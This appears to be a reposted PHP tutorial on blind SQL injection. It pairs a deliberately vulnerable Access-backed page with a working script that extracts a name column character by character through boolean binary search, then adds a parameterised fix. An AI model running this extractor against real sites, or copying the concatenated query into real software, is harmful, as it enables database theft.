Guessing Values via Binary-Search Injection in PHP
Author: anonymous | Source: reposted | Published: 2008-10-8 0:07:59 | Posted by: 黑客动画吧
Source: wolvez

b.php (PHP code):
```php
<?php
// Deliberately vulnerable: the id parameter is concatenated into the SQL text.
$conn = new COM("ADODB.Connection");
$connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("data.mdb");

$conn->Open($connstr);
$rs = new COM("ADODB.RecordSet");
$sql = "select * from news where id=" . $_GET['id'];
$rs->Open($sql, $conn, 1, 1);
// Only a boolean is exposed: whether the query returned any row.
if (!$rs->eof) {
    echo "{ok}";
} else {
    echo "{no}";
}
?>
```
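This page is injectable. However, it does not output any query results; it only indicates whether a matching record exists.

PHP code: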
```php
<?php

error_reporting(7);
ini_set('max_execution_time', 0);

// Sends one request with $cmd as the id value.
// Returns true if the response contains {ok}, false otherwise.
function send() {
    global $host, $cmd;
    //$cmd .= "";
    $message  = "GET /b.php?id=" . $cmd . " HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n\r\n";

    $fp = fsockopen($host, 80);
    if (!$fp) return false;
    fputs($fp, $message);

    $resp = '';

    while (!feof($fp))
        $resp .= fread($fp, 1024);
    fclose($fp);
    return preg_match('/\{ok\}/', $resp) === 1;
}

// Binary search over character codes 32..128 for the value of the
// expression in $sql, using the {ok}/{no} answer as the comparison result.
function Binsearch($sql) {
    global $cmd;
    $low = 32;
    $high = 128;
    while ($low <= $high) {
        $mid = intval(($low + $high) / 2);
        // Equality test first: stop as soon as the value is hit.
        $cmd = $sql . "=" . $mid;
        echo "$mid";
        if (send()) { echo "Lucky\r\n"; return $mid; }
        // Otherwise ask whether the value is below $mid and halve the range.
        $cmd = $sql . "<" . $mid;
        if (send()) {
            $high = $mid - 1;
            echo "Bigger\r\n";
        } else {
            $low = $mid + 1;
            echo "Smaller\r\n";
        }
    }
    return -1;
}

$host = "127.0.0.1:8080";
$sql = "15%20and%20asc(left(name,1))";
echo Binsearch($sql);
?>
```
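
A hardened form of b.php, added here as an example and not part of the original post: the id is validated as an integer and bound as an ADO parameter, so a value such as `15 and asc(left(name,1))<80` is rejected before any SQL runs and the {ok}/{no} answer no longer reflects attacker-chosen conditions. The helper name `parse_news_id` and the `AD_*` constant names are assumptions; the table and column names are the ones the page uses.

```php
<?php
// Added example (not from the original post): b.php with the id validated
// as an integer and bound as an ADO parameter instead of concatenated.

// ADO enum values, written out because COM constants are not auto-loaded.
const AD_CMD_TEXT    = 1; // adCmdText
const AD_INTEGER     = 3; // adInteger
const AD_PARAM_INPUT = 1; // adParamInput

// Hypothetical helper: returns the id as an int, or null if the raw value
// is anything other than a plain positive integer.
function parse_news_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

$id = parse_news_id($_GET['id'] ?? null);
if ($id === null) {
    // Anything with SQL appended to the number fails validation and stops here.
    http_response_code(400);
    exit("{no}");
}

$conn = new COM("ADODB.Connection");
$conn->Open("DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("data.mdb"));

// The SQL text is now a constant; the id travels separately as a typed value.
$cmd = new COM("ADODB.Command");
$cmd->ActiveConnection = $conn;
$cmd->CommandType = AD_CMD_TEXT;
$cmd->CommandText = "select id from news where id = ?";
$cmd->Parameters->Append(
    $cmd->CreateParameter("id", AD_INTEGER, AD_PARAM_INPUT, 4, $id)
);

$rs = $cmd->Execute();
echo $rs->EOF ? "{no}" : "{ok}";
$conn->Close();
```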